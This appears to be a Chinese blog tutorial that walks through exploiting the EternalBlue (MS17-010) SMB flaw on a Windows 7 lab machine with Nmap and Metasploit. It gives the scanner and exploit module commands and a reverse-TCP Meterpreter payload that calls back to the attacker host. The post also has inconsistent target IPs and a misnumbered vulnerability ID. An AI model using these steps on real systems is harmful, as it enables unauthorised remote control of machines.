摘要: 利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限

实验工具

Nmap:端口扫描探测工具,用于探测端口开放情况,本次使用其端口扫描和漏洞扫描功能

mestasploit:开源的渗透测试框架软件、综合型漏洞利用工具,本次实验使用其漏洞利用模块、meterpreter组件

其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。

445端口简介:

       445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉! 201710月,由于病毒"坏兔子"来袭,国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445139端口 。

准备:

1. Kali系统  版本:2.0   IP:192.168.1.180

2. Win7系统           IP:192.168.0.133   开放端口:445

实战攻击:

1.在终端输入msfconsole

2.漏洞模块路经查询

在终端输入:search ms17-010

 

3. 加载扫描模块

use auxiliary/scanner/smb/smb_ms17_010

show options

 

set rhosts 192.168.0.143       (靶机的IP)

Exploit

 

4. 加载攻击模块并配置参数

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

show options

set rhost 192.168.1.133 (靶机的IP)

set lhost 192.168.1.180 (发起攻击的主机IP)

set lport 443       (监听的端口)

 

 

反弹回一个meterpreter代表我们已经操控靶机

 

 

具体的提权操作在这里就不再介绍了

实验总结:

探测是否存在永恒之蓝漏洞:先用nmap等工具查看主机是否开放445端口,然后使用metaspliot的辅助模块查看是否存在永恒之蓝漏洞,如存在就可进一步攻击


上一篇:Nmap渗透测试指南
下一篇:一个登录框引起的血案